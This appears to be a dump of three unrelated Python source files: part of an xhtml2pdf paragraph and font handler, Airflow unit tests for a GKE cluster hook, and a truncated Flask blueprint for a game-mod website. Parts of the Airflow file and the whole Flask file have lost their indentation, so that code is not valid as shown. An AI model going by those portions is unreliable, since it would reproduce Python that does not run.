        style.borderBottomWidth = first.borderBottomWidth
        style.borderBottomColor = first.borderBottomColor
        style.borderLeftStyle = first.borderLeftStyle
        style.borderLeftWidth = first.borderLeftWidth
        style.borderLeftColor = first.borderLeftColor
        style.borderRightStyle = first.borderRightStyle
        style.borderRightWidth = first.borderRightWidth
        style.borderRightColor = first.borderRightColor

        # If no border color is given, the text color is used (XXX Tables!)
        if (style.borderTopColor is None) and style.borderTopWidth:
            style.borderTopColor = first.textColor
        if (style.borderBottomColor is None) and style.borderBottomWidth:
            style.borderBottomColor = first.textColor
        if (style.borderLeftColor is None) and style.borderLeftWidth:
            style.borderLeftColor = first.textColor
        if (style.borderRightColor is None) and style.borderRightWidth:
            style.borderRightColor = first.textColor

        style.borderPadding = first.borderPadding

        style.paddingTop = first.paddingTop
        style.paddingBottom = first.paddingBottom
        style.paddingLeft = first.paddingLeft
        style.paddingRight = first.paddingRight

        style.fontName = tt2ps(first.fontName, first.bold, first.italic)

        return style

    def addTOC(self):
        """Append the table-of-contents flowable, building one style per
        'pdftoclevel0'..'pdftoclevel19' CSS class."""
        styles = []
        for i in six.moves.range(20):
            self.node.attributes["class"] = "pdftoclevel%d" % i
            self.cssAttr = xhtml2pdf.parser.CSSCollect(self.node, self)
            xhtml2pdf.parser.CSS2Frag(self, {
                "margin-top": 0,
                "margin-bottom": 0,
                "margin-left": 0,
                "margin-right": 0,
            }, True)
            pstyle = self.toParagraphStyle(self.frag)
            styles.append(pstyle)

        self.toc.levelStyles = styles
        self.addStory(self.toc)
        self.indexing_story = None

    def addPageCount(self):
        """Switch to multi-build mode so total page count can be resolved."""
        if not self.multiBuild:
            self.indexing_story = PmlPageCount()
            self.multiBuild = True

    def dumpPara(self, frags, style):
        # Debug hook; intentionally a no-op.
        return

    def addPara(self, force=False):
        """Flush the collected fragments into a PmlParagraph on the story."""
        force = (force or self.force)
        self.force = False

        # Cleanup the trail
        try:
            rfragList = reversed(self.fragList)
        except:
            # For Python 2.3 compatibility
            rfragList = copy.copy(self.fragList)
            rfragList.reverse()

        # Find maximum lead
        maxLeading = 0
        #fontSize = 0
        for frag in self.fragList:
            leading = getSize(frag.leadingSource, frag.fontSize) + frag.leadingSpace
            maxLeading = max(leading, frag.fontSize + frag.leadingSpace, maxLeading)
            frag.leading = leading

        if force or (self.text.strip() and self.fragList):

            # Update paragraph style by style of first fragment
            first = self.fragBlock
            style = self.toParagraphStyle(first)
            # style.leading = first.leading + first.leadingSpace
            if first.leadingSpace:
                style.leading = maxLeading
            else:
                style.leading = getSize(first.leadingSource, first.fontSize) + first.leadingSpace

            bulletText = copy.copy(first.bulletText)
            first.bulletText = None

            # Add paragraph to story
            if force or len(self.fragAnchor + self.fragList) > 0:

                # We need this empty fragment to work around problems in
                # Reportlab paragraphs regarding backGround etc.
                if self.fragList:
                    self.fragList.append(self.fragList[- 1].clone(text=''))
                else:
                    blank = self.frag.clone()
                    blank.fontName = "Helvetica"
                    blank.text = ''
                    self.fragList.append(blank)

                self.dumpPara(self.fragAnchor + self.fragList, style)
                para = PmlParagraph(
                    self.text,
                    style,
                    frags=self.fragAnchor + self.fragList,
                    bulletText=bulletText)

                para.outline = first.outline
                para.outlineLevel = first.outlineLevel
                para.outlineOpen = first.outlineOpen
                para.keepWithNext = first.keepWithNext
                para.autoLeading = "max"

                if self.image:
                    para = PmlParagraphAndImage(
                        para,
                        self.image,
                        side=self.imageData.get("align", "left"))

                self.addStory(para)

            self.fragAnchor = []
            first.bulletText = None

        # Reset data
        self.image = None
        self.imageData = {}
        self.clearFrag()

    # METHODS FOR FRAG
    def clearFrag(self):
        """Reset the fragment accumulation state."""
        self.fragList = []
        self.fragStrip = True
        self.text = u""

    def copyFrag(self, **kw):
        """Return a clone of the current fragment with overrides applied."""
        return self.frag.clone(**kw)

    def newFrag(self, **kw):
        """Replace the current fragment with a clone (plus overrides)."""
        self.frag = self.frag.clone(**kw)
        return self.frag

    def _appendFrag(self, frag):
        # Internal anchors ("#name" links) are tracked for later resolution.
        if frag.link and frag.link.startswith("#"):
            self.anchorFrag.append((frag, frag.link[1:]))
        self.fragList.append(frag)

    # XXX Argument frag is useless!
    def addFrag(self, text="", frag=None):

        frag = baseFrag = self.frag.clone()

        # if sub and super are both on they will cancel each other out
        if frag.sub == 1 and frag.super == 1:
            frag.sub = 0
            frag.super = 0

        # XXX Has to be replaced by CSS styles like vertical-align and font-size
        if frag.sub:
            frag.rise = - frag.fontSize * subFraction
            frag.fontSize = max(frag.fontSize - sizeDelta, 3)
        elif frag.super:
            frag.rise = frag.fontSize * superFraction
            frag.fontSize = max(frag.fontSize - sizeDelta, 3)

        # bold, italic, and underline
        frag.fontName = frag.bulletFontName = tt2ps(frag.fontName, frag.bold, frag.italic)

        # Strip soft hyphens (U+00AD) and normalize NBSP variants to NBSP
        text = (text
                .replace(u"\xad", u"")
                .replace(u"\xc2\xa0", NBSP)
                .replace(u"\xa0", NBSP))

        if frag.whiteSpace == "pre":

            # Handle by lines
            for text in re.split(r'(\r\n|\n|\r)', text):
                # This is an exceptionally expensive piece of code
                self.text += text
                if ("\n" in text) or ("\r" in text):
                    # If EOL insert a linebreak
                    frag = baseFrag.clone()
                    frag.text = ""
                    frag.lineBreak = 1
                    self._appendFrag(frag)
                else:
                    # Handle tabs in a simple way
                    text = text.replace(u"\t", 8 * u" ")
                    # Somehow for Reportlab NBSP have to be inserted
                    # as single character fragments
                    for text in re.split(r'(\ )', text):
                        frag = baseFrag.clone()
                        if text == " ":
                            text = NBSP
                        frag.text = text
                        self._appendFrag(frag)
        else:
            for text in re.split(u'(' + NBSP + u')', text):
                frag = baseFrag.clone()
                if text == NBSP:
                    self.force = True
                    frag.text = NBSP
                    self.text += text
                    self._appendFrag(frag)
                else:
                    # Collapse runs of whitespace; the "x" sentinels preserve
                    # leading/trailing single spaces through split/join.
                    frag.text = " ".join(("x" + text + "x").split())[1: - 1]
                    if self.fragStrip:
                        frag.text = frag.text.lstrip()
                        if frag.text:
                            self.fragStrip = False
                    self.text += frag.text
                    self._appendFrag(frag)

    def pushFrag(self):
        """Save the current fragment on the stack and start a fresh clone."""
        self.fragStack.append(self.frag)
        self.newFrag()

    def pullFrag(self):
        """Restore the most recently pushed fragment."""
        self.frag = self.fragStack.pop()

    # XXX
    def _getFragment(self, l=20):
        # Short XML snippet of the current node, for log/error context.
        try:
            return repr(" ".join(self.node.toxml().split()[:l]))
        except:
            return ""

    def _getLineNumber(self):
        # Source line numbers are not tracked; always 0.
        return 0

    def context(self, msg):
        """Return *msg* followed by a snippet of the current node."""
        return "%s\n%s" % (
            str(msg),
            self._getFragment(50))

    def warning(self, msg, *args):
        """Record a warning in the log and return its contextualised text."""
        self.warn += 1
        self.log.append((xhtml2pdf.default.PML_WARNING, self._getLineNumber(), str(msg), self._getFragment(50)))
        try:
            return self.context(msg % args)
        except:
            return self.context(msg)

    def error(self, msg, *args):
        """Record an error in the log and return its contextualised text."""
        self.err += 1
        self.log.append((xhtml2pdf.default.PML_ERROR, self._getLineNumber(), str(msg), self._getFragment(50)))
        try:
            return self.context(msg % args)
        except:
            return self.context(msg)

    # UTILS
    def _getFileDeprecated(self, name, relative):
        """Legacy path resolution used only when a pathCallback is installed."""
        try:
            path = relative or self.pathDirectory
            if name.startswith("data:"):
                return name
            if self.pathCallback is not None:
                nv = self.pathCallback(name, relative)
            else:
                if path is None:
                    log.warn("Could not find main directory for getting filename. Use CWD")
                    path = os.getcwd()
                nv = os.path.normpath(os.path.join(path, name))
                if not (nv and os.path.isfile(nv)):
                    nv = None
            if nv is None:
                log.warn(self.warning("File '%s' does not exist", name))
            return nv
        except:
            log.warn(self.warning("getFile %r %r %r", name, relative, path), exc_info=1)

    def getFile(self, name, relative=None):
        """
        Returns a file name or None
        """
        if self.pathCallback is not None:
            return getFile(self._getFileDeprecated(name, relative))
        return getFile(name, relative or self.pathDirectory)

    def getFontName(self, names, default="helvetica"):
        """
        Name of a font
        """
        # print names, self.fontList
        if type(names) is not ListType:
            if type(names) not in six.string_types:
                names = str(names)
            names = names.strip().split(",")
        for name in names:
            if type(name) not in six.string_types:
                name = str(name)
            font = self.fontList.get(name.strip().lower(), None)
            if font is not None:
                return font
        return self.fontList.get(default, None)

    def registerFont(self, fontname, alias=None):
        """Register *fontname* (and optional aliases) in the font lookup table."""
        alias = alias if alias is not None else []
        self.fontList[str(fontname).lower()] = str(fontname)
        for a in alias:
            if type(fontname) not in six.string_types:
                fontname = str(fontname)
            self.fontList[str(a)] = fontname

    def loadFont(self, names, src, encoding="WinAnsiEncoding", bold=0, italic=0):
        """Embed a TTF/TTC or AFM/PFB font file and register it (plus
        bold/italic mappings) under all requested alias names."""

        # XXX Just works for local filenames!
        if names and src:

            file = src
            src = file.uri

            log.debug("Load font %r", src)

            if type(names) is ListType:
                fontAlias = names
            else:
                fontAlias = (x.lower().strip() for x in names.split(",") if x)

            # XXX Problems with unicode here
            fontAlias = [str(x) for x in fontAlias]

            fontName = fontAlias[0]
            parts = src.split(".")
            baseName, suffix = ".".join(parts[: - 1]), parts[- 1]
            suffix = suffix.lower()

            if suffix in ["ttc", "ttf"]:

                # determine full font name according to weight and style
                fullFontName = "%s_%d%d" % (fontName, bold, italic)

                # check if font has already been registered
                if fullFontName in self.fontList:
                    log.warn(self.warning("Repeated font embed for %s, skip new embed ", fullFontName))
                else:

                    # Register TTF font and special name
                    filename = file.getNamedFile()
                    pdfmetrics.registerFont(TTFont(fullFontName, filename))

                    # Add or replace missing styles
                    for bold in (0, 1):
                        for italic in (0, 1):
                            if ("%s_%d%d" % (fontName, bold, italic)) not in self.fontList:
                                addMapping(fontName, bold, italic, fullFontName)

                    # Register "normal" name and the place holder for style
                    self.registerFont(fontName, fontAlias + [fullFontName])

            elif suffix in ("afm", "pfb"):

                if suffix == "afm":
                    afm = file.getNamedFile()
                    tfile = pisaFileObject(baseName + ".pfb")
                    pfb = tfile.getNamedFile()
                else:
                    pfb = file.getNamedFile()
                    tfile = pisaFileObject(baseName + ".afm")
                    afm = tfile.getNamedFile()

                # determine full font name according to weight and style
                fullFontName = "%s_%d%d" % (fontName, bold, italic)

                # check if font has already been registered
                if fullFontName in self.fontList:
                    log.warn(self.warning("Repeated font embed for %s, skip new embed", fontName))
                else:

                    # Include font
                    face = pdfmetrics.EmbeddedType1Face(afm, pfb)
                    fontNameOriginal = face.name
                    pdfmetrics.registerTypeFace(face)
                    # print fontName, fontNameOriginal, fullFontName
                    justFont = pdfmetrics.Font(fullFontName, fontNameOriginal, encoding)
                    pdfmetrics.registerFont(justFont)

                    # Add or replace missing styles
                    for bold in (0, 1):
                        for italic in (0, 1):
                            if ("%s_%d%d" % (fontName, bold, italic)) not in self.fontList:
                                addMapping(fontName, bold, italic, fontNameOriginal)

                    # Register "normal" name and the place holder for style
                    self.registerFont(fontName, fontAlias + [fullFontName, fontNameOriginal])

            else:
                log.warning(self.warning("wrong attributes for <pdf:font>"))
| apache-2.0 |
subodhchhabra/airflow | tests/contrib/hooks/test_gcp_container_hook.py | 5 | 10109 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
from airflow import AirflowException
from airflow.contrib.hooks.gcp_container_hook import GKEClusterHook
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
TASK_ID = 'test-gke-cluster-operator'
CLUSTER_NAME = 'test-cluster'
TEST_PROJECT_ID = 'test-project'
ZONE = 'test-zone'
class GKEClusterHookDeleteTest(unittest.TestCase):
    """Tests for GKEClusterHook.delete_cluster."""

    def setUp(self):
        # Bypass __init__ (it would build a real API client) and stub the
        # fields the hook methods read.
        with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
            self.gke_hook = GKEClusterHook(None, None, None)
            self.gke_hook.project_id = TEST_PROJECT_ID
            self.gke_hook.location = ZONE
            self.gke_hook.client = mock.Mock()

    @mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
    @mock.patch(
        "airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
    def test_delete_cluster(self, wait_mock, convert_mock):
        # Deleting by name should forward everything to the client and wait
        # on the returned operation; no dict-to-proto conversion happens.
        retry_mock, timeout_mock = mock.Mock(), mock.Mock()
        client_delete = self.gke_hook.client.delete_cluster = mock.Mock()
        self.gke_hook.delete_cluster(name=CLUSTER_NAME, retry=retry_mock,
                                     timeout=timeout_mock)
        client_delete.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
                                         cluster_id=CLUSTER_NAME,
                                         retry=retry_mock, timeout=timeout_mock)
        wait_mock.assert_called_with(client_delete.return_value)
        convert_mock.assert_not_called()

    @mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
    @mock.patch(
        "airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
    def test_delete_cluster_error(self, wait_mock, convert_mock):
        # To force an error
        self.gke_hook.client.delete_cluster.side_effect = AirflowException('400')
        with self.assertRaises(AirflowException):
            self.gke_hook.delete_cluster(None)
        # BUG FIX: these assertions were indented inside the assertRaises
        # block, after the line that raises, so they never executed.
        wait_mock.assert_not_called()
        convert_mock.assert_not_called()
class GKEClusterHookCreateTest(unittest.TestCase):
    """Tests for GKEClusterHook.create_cluster."""

    def setUp(self):
        # Bypass __init__ (it would build a real API client) and stub the
        # fields the hook methods read.
        with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
            self.gke_hook = GKEClusterHook(None, None, None)
            self.gke_hook.project_id = TEST_PROJECT_ID
            self.gke_hook.location = ZONE
            self.gke_hook.client = mock.Mock()

    @mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
    @mock.patch(
        "airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
    def test_create_cluster_proto(self, wait_mock, convert_mock):
        # A Cluster proto must be passed straight through, unconverted.
        from google.cloud.container_v1.proto.cluster_service_pb2 import Cluster
        mock_cluster_proto = Cluster()
        mock_cluster_proto.name = CLUSTER_NAME
        retry_mock, timeout_mock = mock.Mock(), mock.Mock()
        client_create = self.gke_hook.client.create_cluster = mock.Mock()
        self.gke_hook.create_cluster(mock_cluster_proto, retry=retry_mock,
                                     timeout=timeout_mock)
        client_create.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
                                         cluster=mock_cluster_proto,
                                         retry=retry_mock, timeout=timeout_mock)
        wait_mock.assert_called_with(client_create.return_value)
        convert_mock.assert_not_called()

    @mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
    @mock.patch(
        "airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
    def test_delete_cluster_dict(self, wait_mock, convert_mock):
        # NOTE: despite the name, this exercises create_cluster with a dict
        # argument, which must be converted to a proto via _dict_to_proto.
        # (Name kept for backward compatibility with existing test IDs.)
        mock_cluster_dict = {'name': CLUSTER_NAME}
        retry_mock, timeout_mock = mock.Mock(), mock.Mock()
        client_create = self.gke_hook.client.create_cluster = mock.Mock()
        proto_mock = convert_mock.return_value = mock.Mock()
        self.gke_hook.create_cluster(mock_cluster_dict, retry=retry_mock,
                                     timeout=timeout_mock)
        client_create.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
                                         cluster=proto_mock,
                                         retry=retry_mock, timeout=timeout_mock)
        wait_mock.assert_called_with(client_create.return_value)
        self.assertEqual(convert_mock.call_args[1]['py_dict'], mock_cluster_dict)

    @mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
    @mock.patch(
        "airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
    def test_create_cluster_error(self, wait_mock, convert_mock):
        # to force an error
        mock_cluster_proto = None
        with self.assertRaises(AirflowException):
            self.gke_hook.create_cluster(mock_cluster_proto)
        # BUG FIX: these assertions were indented inside the assertRaises
        # block, after the line that raises, so they never executed.
        wait_mock.assert_not_called()
        convert_mock.assert_not_called()
class GKEClusterHookGetTest(unittest.TestCase):
    """Tests for GKEClusterHook.get_cluster."""

    def setUp(self):
        # Bypass __init__ (it would build a real API client) and stub the
        # fields the hook methods read.
        with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
            self.gke_hook = GKEClusterHook(None, None, None)
            self.gke_hook.project_id = TEST_PROJECT_ID
            self.gke_hook.location = ZONE
            self.gke_hook.client = mock.Mock()

    def test_get_cluster(self):
        # Getting by name should forward project/zone/cluster to the client.
        retry_mock, timeout_mock = mock.Mock(), mock.Mock()
        client_get = self.gke_hook.client.get_cluster = mock.Mock()
        self.gke_hook.get_cluster(name=CLUSTER_NAME, retry=retry_mock,
                                  timeout=timeout_mock)
        client_get.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
                                      cluster_id=CLUSTER_NAME,
                                      retry=retry_mock, timeout=timeout_mock)
class GKEClusterHookTest(unittest.TestCase):
    """Tests for GKEClusterHook helper methods (labels, polling, proto conversion)."""

    def setUp(self):
        # Bypass __init__ (it would build a real API client) and stub the
        # fields the hook methods read.
        with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
            self.gke_hook = GKEClusterHook(None, None, None)
            self.gke_hook.project_id = TEST_PROJECT_ID
            self.gke_hook.location = ZONE
            self.gke_hook.client = mock.Mock()

    def test_get_operation(self):
        self.gke_hook.client.get_operation = mock.Mock()
        self.gke_hook.get_operation('TEST_OP')
        self.gke_hook.client.get_operation.assert_called_with(project_id=TEST_PROJECT_ID,
                                                              zone=ZONE,
                                                              operation_id='TEST_OP')

    def test_append_label(self):
        key = 'test-key'
        val = 'test-val'
        mock_proto = mock.Mock()
        self.gke_hook._append_label(mock_proto, key, val)
        mock_proto.resource_labels.update.assert_called_with({key: val})

    def test_append_label_replace(self):
        # Characters invalid in GKE labels ('.', '+') must be replaced by '-'.
        key = 'test-key'
        val = 'test.val+this'
        mock_proto = mock.Mock()
        self.gke_hook._append_label(mock_proto, key, val)
        mock_proto.resource_labels.update.assert_called_with({key: 'test-val-this'})

    @mock.patch("time.sleep")
    def test_wait_for_response_done(self, time_mock):
        from google.cloud.container_v1.gapic.enums import Operation
        mock_op = mock.Mock()
        mock_op.status = Operation.Status.DONE
        self.gke_hook.wait_for_operation(mock_op)
        self.assertEqual(time_mock.call_count, 1)

    @mock.patch("time.sleep")
    def test_wait_for_response_exception(self, time_mock):
        from google.cloud.container_v1.gapic.enums import Operation
        from google.cloud.exceptions import GoogleCloudError
        mock_op = mock.Mock()
        mock_op.status = Operation.Status.ABORTING
        with self.assertRaises(GoogleCloudError):
            self.gke_hook.wait_for_operation(mock_op)
        # BUG FIX: this assertion was indented inside the assertRaises block,
        # after the line that raises, so it never executed.
        self.assertEqual(time_mock.call_count, 1)

    @mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.get_operation")
    @mock.patch("time.sleep")
    def test_wait_for_response_running(self, time_mock, operation_mock):
        from google.cloud.container_v1.gapic.enums import Operation
        running_op, done_op, pending_op = mock.Mock(), mock.Mock(), mock.Mock()
        running_op.status = Operation.Status.RUNNING
        done_op.status = Operation.Status.DONE
        pending_op.status = Operation.Status.PENDING
        # Status goes from Running -> Pending -> Done
        operation_mock.side_effect = [pending_op, done_op]
        self.gke_hook.wait_for_operation(running_op)
        self.assertEqual(time_mock.call_count, 3)
        operation_mock.assert_any_call(running_op.name)
        operation_mock.assert_any_call(pending_op.name)
        self.assertEqual(operation_mock.call_count, 2)

    @mock.patch("google.protobuf.json_format.Parse")
    @mock.patch("json.dumps")
    def test_dict_to_proto(self, dumps_mock, parse_mock):
        # _dict_to_proto should serialize the dict to JSON and parse the JSON
        # into the supplied proto instance.
        mock_dict = {'name': 'test'}
        mock_proto = mock.Mock()
        dumps_mock.return_value = mock.Mock()
        self.gke_hook._dict_to_proto(mock_dict, mock_proto)
        dumps_mock.assert_called_with(mock_dict)
        parse_mock.assert_called_with(dumps_mock(), mock_proto)
| apache-2.0 |
ModulousSmash/Modulous | KerbalStuff/blueprints/mods.py | 1 | 19423 | from flask import Blueprint, render_template, request, g, Response, redirect, session, abort, send_file, make_response, url_for
from flask.ext.login import current_user
from sqlalchemy import desc
from KerbalStuff.objects import User, Mod, ModVersion, DownloadEvent, FollowEvent, ReferralEvent, Featured, Media, GameVersion, Category, Report
from KerbalStuff.email import send_update_notification, send_autoupdate_notification
from KerbalStuff.database import db
from KerbalStuff.common import *
from KerbalStuff.config import _cfg
from KerbalStuff.blueprints.api import default_description
from KerbalStuff.ckan import send_to_ckan
from werkzeug.utils import secure_filename
from datetime import datetime, timedelta
from shutil import rmtree, copyfile
from urllib.parse import urlparse
import os
import zipfile
import urllib
import random
mods = Blueprint('mods', __name__, template_folder='../../templates/mods')
@mods.route("/random")
def random_mod():
mods = Mod.query.filter(Mod.published == True).all()
mod = random.choice(mods)
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route("/mod/<int:id>/<path:mod_name>/update")
def update(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
editable = False
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
editable = True
if not editable:
abort(401)
return render_template("update.html", mod=mod, game_versions=GameVersion.query.order_by(desc(GameVersion.id)).all())
@mods.route("/mod/<int:id>.rss", defaults={'mod_name': None})
@mods.route("/mod/<int:id>/<path:mod_name>.rss")
def mod_rss(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
return render_template("rss-mod.xml", mod=mod)
@mods.route("/mod/<int:id>", defaults={'mod_name': None})
@mods.route("/mod/<int:id>/<path:mod_name>")
@with_session
def mod(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
editable = False
if current_user:
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if not mod.published and not editable:
abort(401)
latest = mod.default_version()
referral = request.referrer
if referral:
host = urllib.parse.urlparse(referral).hostname
event = ReferralEvent.query\
.filter(ReferralEvent.mod_id == mod.id)\
.filter(ReferralEvent.host == host)\
.first()
if not event:
event = ReferralEvent()
event.mod = mod
event.events = 1
event.host = host
db.add(event)
db.flush()
db.commit()
mod.referrals.append(event)
else:
event.events += 1
download_stats = None
follower_stats = None
referrals = None
json_versions = None
thirty_days_ago = datetime.now() - timedelta(days=30)
referrals = list()
for r in ReferralEvent.query\
.filter(ReferralEvent.mod_id == mod.id)\
.order_by(desc(ReferralEvent.events)):
referrals.append( { 'host': r.host, 'count': r.events } )
download_stats = list()
for d in DownloadEvent.query\
.filter(DownloadEvent.mod_id == mod.id)\
.filter(DownloadEvent.created > thirty_days_ago)\
.order_by(DownloadEvent.created):
download_stats.append(dumb_object(d))
follower_stats = list()
for f in FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.filter(FollowEvent.created > thirty_days_ago)\
.order_by(FollowEvent.created):
follower_stats.append(dumb_object(f))
json_versions = list()
for v in mod.versions:
json_versions.append({ 'name': v.friendly_version, 'id': v.id })
if request.args.get('noedit') != None:
editable = False
forumThread = False
if mod.external_link != None:
try:
u = urlparse(mod.external_link)
if u.netloc == 'forum.kerbalspaceprogram.com':
forumThread = True
except e:
print(e)
pass
total_authors = 1
pending_invite = False
owner = editable
for a in mod.shared_authors:
if a.accepted:
total_authors += 1
if current_user:
if current_user.id == a.user_id and not a.accepted:
pending_invite = True
if current_user.id == a.user_id and a.accepted:
editable = True
game_versions = GameVersion.query.order_by(desc(GameVersion.id)).all()
outdated = False
if latest:
outdated = game_versions[0].friendly_version != latest.ksp_version
return render_template("mod.html",
**{
'mod': mod,
'latest': latest,
'safe_name': secure_filename(mod.name)[:64],
'featured': any(Featured.query.filter(Featured.mod_id == mod.id).all()),
'editable': editable,
'owner': owner,
'pending_invite': pending_invite,
'download_stats': download_stats,
'follower_stats': follower_stats,
'referrals': referrals,
'json_versions': json_versions,
'thirty_days_ago': thirty_days_ago,
'share_link': urllib.parse.quote_plus(_cfg("protocol") + "://" + _cfg("domain") + "/mod/" + str(mod.id)),
'game_versions': game_versions,
'outdated': outdated,
'forum_thread': forumThread,
'new': request.args.get('new') != None,
'stupid_user': request.args.get('stupid_user') != None,
'total_authors': total_authors
})
@mods.route("/mod/<int:id>/<path:mod_name>/edit", methods=['GET', 'POST'])
@with_session
@loginrequired
def edit_mod(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
editable = False
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
editable = True
if not editable:
abort(401)
if request.method == 'GET':
return render_template("edit_mod.html", mod=mod, original=mod.user == current_user, categories = Category.query.all())
else:
short_description = request.form.get('short-description')
tags = request.form.get('tags')
other_authors = request.form.get('other-authors')
print(request.form.get('other-authors'))
tags_array = request.form.get('tags')
modmm = request.form.get('modmm')
if modmm == None:
modmm = False
else:
modmm = (modmm.lower() == "true" or modmm.lower() == "yes" or modmm.lower() == "on")
license = request.form.get('license')
category = request.form.get('category')
donation_link = request.form.get('donation-link')
external_link = request.form.get('external-link')
source_link = request.form.get('source-link')
description = request.form.get('description')
background = request.form.get('background')
bgOffsetY = request.form.get('bg-offset-y')
if not license or license == '':
return render_template("edit_mod.html", mod=mod, error="All mods must have a license.")
if not category or category == '':
abort(401)
else:
category = Category.query.filter(Category.name == category).first()
mod.short_description = short_description
mod.license = license
mod.donation_link = donation_link
mod.external_link = external_link
mod.source_link = source_link
mod.description = description
mod.tags = tags
mod.modmm = modmm
mod.category = category
if other_authors == 'None' or other_authors == '':
mod.other_authors = None
else:
mod.other_authors = other_authors
if background and background != '':
mod.background = background
try:
mod.bgOffsetY = int(bgOffsetY)
except:
pass
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route("/create/mod")
@loginrequired
@with_session
def create_mod():
return render_template("create.html", **{ 'game_versions': GameVersion.query.order_by(desc(GameVersion.id)).all(), 'categories': Category.query.all()})
@mods.route("/mod/<int:mod_id>/stats/downloads", defaults={'mod_name': None})
@mods.route("/mod/<int:mod_id>/<path:mod_name>/stats/downloads")
def export_downloads(mod_id, mod_name):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
download_stats = DownloadEvent.query\
.filter(DownloadEvent.mod_id == mod.id)\
.order_by(DownloadEvent.created)
response = make_response(render_template("downloads.csv", stats=download_stats))
response.headers['Content-Type'] = 'text/csv'
response.headers['Content-Disposition'] = 'attachment;filename=downloads.csv'
return response
@mods.route("/mod/<int:mod_id>/stats/followers", defaults={'mod_name': None})
@mods.route("/mod/<int:mod_id>/<path:mod_name>/stats/followers")
def export_followers(mod_id, mod_name):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
follower_stats = FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.order_by(FollowEvent.created)
response = make_response(render_template("followers.csv", stats=follower_stats))
response.headers['Content-Type'] = 'text/csv'
response.headers['Content-Disposition'] = 'attachment;filename=followers.csv'
return response
@mods.route("/mod/<int:mod_id>/stats/referrals", defaults={'mod_name': None})
@mods.route("/mod/<mod_id>/<path:mod_name>/stats/referrals")
def export_referrals(mod_id, mod_name):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
referral_stats = ReferralEvent.query\
.filter(ReferralEvent.mod_id == mod.id)\
.order_by(desc(ReferralEvent.events))
response = make_response(render_template("referrals.csv", stats=referral_stats))
response.headers['Content-Type'] = 'text/csv'
response.headers['Content-Disposition'] = 'attachment;filename=referrals.csv'
return response
@mods.route("/mod/<int:mod_id>/delete", methods=['POST'])
@loginrequired
@with_session
def delete(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
editable = False
if current_user:
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if not editable:
abort(401)
db.delete(mod)
for feature in Featured.query.filter(Featured.mod_id == mod.id).all():
db.delete(feature)
for media in Media.query.filter(Media.mod_id == mod.id).all():
db.delete(media)
for version in ModVersion.query.filter(ModVersion.mod_id == mod.id).all():
db.delete(version)
base_path = os.path.join(secure_filename(mod.user.username) + '_' + str(mod.user.id), secure_filename(mod.name))
full_path = os.path.join(_cfg('storage'), base_path)
db.commit()
rmtree(full_path)
return redirect("/profile/" + current_user.username)
@mods.route("/mod/<int:mod_id>/follow", methods=['POST'])
@loginrequired
@json_output
@with_session
def follow(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
if any(m.id == mod.id for m in current_user.following):
abort(418)
event = FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.order_by(desc(FollowEvent.created))\
.first()
# Events are aggregated hourly
if not event or ((datetime.now() - event.created).seconds / 60 / 60) >= 1:
event = FollowEvent()
event.mod = mod
event.delta = 1
event.events = 1
db.add(event)
db.flush()
db.commit()
mod.follow_events.append(event)
else:
event.delta += 1
event.events += 1
mod.follower_count += 1
current_user.following.append(mod)
return { "success": True }
@mods.route("/mod/<int:mod_id>/unfollow", methods=['POST'])
@loginrequired
@json_output
@with_session
def unfollow(mod_id):
